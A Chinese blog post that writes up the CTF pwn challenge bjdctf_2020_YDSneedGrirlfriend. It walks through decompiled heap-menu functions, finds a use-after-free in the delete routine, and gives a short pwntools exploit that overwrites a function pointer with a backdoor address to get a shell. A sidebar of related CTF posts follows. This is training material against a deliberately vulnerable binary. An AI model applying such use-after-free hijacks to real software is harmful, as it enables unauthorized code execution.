bjdctf_2020_YDSneedGrirlfriend

最新推荐文章于 2024-09-10 17:21:53 发布
最新推荐文章于 2024-09-10 17:21:53 发布
阅读量75 收藏 1
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132502603
版权

bjdctf_2020_YDSneedGrirlfriend

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)

64位,没开pie,看ida

首当其冲看到backdoor,这下子no pie就很爽了

unsigned __int64 add_girlfriend()
{
  __int64 v0; // rbx
  int i; // [rsp+8h] [rbp-28h]
  int v3; // [rsp+Ch] [rbp-24h]
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  if ( count <= 10 )
  {
    for ( i = 0; i <= 9; ++i )
    {
      if ( !*(&girlfriendlist + i) )
      {
        *(&girlfriendlist + i) = malloc(0x10uLL);
        if ( !*(&girlfriendlist + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_QWORD *)*(&girlfriendlist + i) = print_girlfriend_name;
        printf("Her name size is :");
        read(0, buf, 8uLL);
        v3 = atoi(buf);
        v0 = (__int64)*(&girlfriendlist + i);
        *(_QWORD *)(v0 + 8) = malloc(v3);
        if ( !*((_QWORD *)*(&girlfriendlist + i) + 1) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Her name is :");
        read(0, *((void **)*(&girlfriendlist + i) + 1), v3);
        puts("Success !Wow YDS get a girlfriend!");
        ++count;
        return __readfsqword(0x28u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readfsqword(0x28u) ^ v5;
}

申请两个堆

第一个堆里面放着print_girlfriend_name和第二个堆的内容指针

无大小size申请限制,可以unsortedbin泄露libc(x 想到这里的时候已经忘记有backdoor了

unsigned __int64 del_girlfriend()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( v1 >= 0 && v1 < count )
  {
    if ( *(&girlfriendlist + v1) )
    {
      free(*((void **)*(&girlfriendlist + v1) + 1));
      free(*(&girlfriendlist + v1));
      puts("Success");
    }
  }
  else
  {
    puts("Out of bound!");
  }
  return __readfsqword(0x28u) ^ v3;
}

uaf…

unsigned __int64 print_girlfriend()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( v1 >= 0 && v1 < count )
  {
    if ( *(&girlfriendlist + v1) )
      (*(void (__fastcall **)(_QWORD))*(&girlfriendlist + v1))(*(&girlfriendlist + v1));
  }
  else
  {
    puts("Out of bound!");
  }
  return __readfsqword(0x28u) ^ v3;
}

show这里是调用第一个堆的存放的print_girlfriend_name来打印我们的内容

假如我们把这个print_girlfriend_name改成backdoor,这不就直接getshell了吗
在这里插入图片描述
因为uaf,我们还是可以show1所以getshell

from pwn import*
from Yapack import *

context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",28497,"./pwn",10)

sh=0x400BAA
add(0x20,'aa')#0
add(0x20,'aa')#1		#这里就是为了申请出两个程序给我们malloc的两个堆
dele(1)					
dele(0)					
add(0x10,p64(sh))		#然后我们申请回程序给我们malloc两个堆
show(1)					#触发print_girlfriend_name--->system

#debug()
ia()

在这里插入图片描述

YameMres
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1520
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
BUUCTF:bjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 923
BUUCTF:bjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数
【PWN · heap | UAF】[BJDCTF 2020]YDSneedGirlfriend
Mr_Fmnwon的博客
11-02 198
UAF-释放后重用,这一题和wiki上教学的那一题一样,是纯的裸UAF题目初步涉猎heap,对于典型的漏洞利用,多加记载。
[BUUCTF]PWN——bjdctf_2020_YDSneedGrirlfriend(UAF)
mcmuyanga的博客
03-19 646
bjdctf_2020_YDSneedGrirlfriend 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,常见的堆题的菜单 64位ida载入,首先是检索字符串发现了程序中的后门函数,backdoor=0x400b9c add_girlfriend() del_girlfriend() print_girlfriend() 常见的uaf漏洞的利用方法,不清楚的详细看ctfwiki show函数会调用chunk里的puts输出chunk里的name
bjdctf_2020_YDSneedGrirlfriend(uaf)
m0_51251108的博客
11-04 331
bjdctf_2020_YDSneedGrirlfriend: 先大致一看 逆向分析: 主界面: add函数: free函数: show函数: 有后门 利用思路: 申请size同为0x20大小的chunk, doublefree 申请个不同size的chunk,使从bin链中取出一个0x20 位置就置换了,我们就能控制前面图片中说的要改的那个指针的值了 我们add 0x20 size,把它改为后门地址 然后show就可以了 exp: from pwn import * #from LibcSe
bjdctf_2020_YDSneedGrirlfriend【write up】
m0_73756460的博客
04-14 136
buu刷题 bjdctf_2020_YDSneedGrirlfriend【write up】
BUUCTF (pwn) bjdctf_2020_YDSneedGrirlfriend(UAF)
半岛铁盒的博客
06-19 211
这道题知识点,题型与 actf_2019_babyheap这道题很相似,就不写那么详细了,又不了解的可以去看看 菜单 后门 EXP from pwn import * p=remote('node3.buuoj.cn',29716) #p=process('./bjdctf_2020_YDSneedGrirlfriend') elf=ELF('./bjdctf_2020_YDSneedGrirlfriend') def add(size,name): p.sendlineaft
bjdctf_2020_babyrop
m0_52231248的博客
11-15 906
bjdctf_2020_babyrop Ubuntu16 Checksec: Ida: 标准的ret2libc,有puts函数,offest=0x28 Exp: from pwn import * from LibcSearcher import * context(log_level='debug') p = remote("node4.buuoj.cn",26832) elf = ELF('./bjdctf_2020_babyrop') read_got = elf.got['re
bjdctf_2020_babyrop 与bjdctf_2020_babyrop2(格式化字符leak)
beaster1的博客
04-06 441
bjdctf_2020_babyrop 先checksec 打开ida正常查看函数 打开init函数发现puts函数 然后进入vuln函数 存在栈溢出 没有看到后门函数应该是libc leak+rop 代码如下 from pwn import* from LibcSearcher import* p=remote('node3.buuoj.cn',29901) #p=process('') elf=ELF('bjdctf_2020_babyrop') puts_got=elf.got['puts'] p
bjdctf_2020_babystack
m0_52231248的博客
11-07 89
bjdctf_2020_babystack 题目Ubuntu 16 Checksec检查一下 Ida: read函数的读取长度是我们的输入,存在溢出点,offest=0x10+0x8 然后main函数上面就是backdoor函数 构造exp: 成功得到flag:
第146天:内网安全-Web权限维持&各语言内存马&Servlet-api类&Spring类&Agent类
最新发布
weixin_71529930的博客
09-10 723
然后访问http://ip/,这里会卡住,把之前创建的index文件会被删除,后面的页面是我访问的缓存,同时会产生一个.HH.php文件,这个文件是linux的隐藏文件,但是不知为何,我linux搭建的访问不了,只能这样演示。在我去删除的时候,他又会立刻去创建出来,甚至在我鼠标右键的时候因为这个文件不断地创建,右键页面也不能打开,从时间也可以看出来这个文件,在一直的刷新。后面换成了小迪视频里面的冰蝎版本,视频中问题是木马不能再Upload目录下,这里我试了也不行,所以这个还是有很多的bug的。
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 702
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 490
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1475
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
注册安全分析报告:熊猫频道
Explinks的博客
09-10 376
熊猫频道作为央视的子频道, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 863
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
3.比 HTTP 更安全的 HTTPS(工作原理理解、非对称加密理解、证书理解)
weixin_52173250的博客
09-07 1407
HTTPS(Hypertext Transfer Protocol Secure)是一种安全的超文本传输协议,主要用于在客户端和服务器之间安全地传输数据
[BJDCTF2020]RSA
08-11
RSA(Rivest-Shamir-Adleman)是一种非对称加密算法,常用于数据加密和数字签名。...在BJDCTF2020中,RSA可能是一个题目或者提到的某个技术细节。若有具体问题或需要更多信息,请提供详细内容以便我能够帮助你更好。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值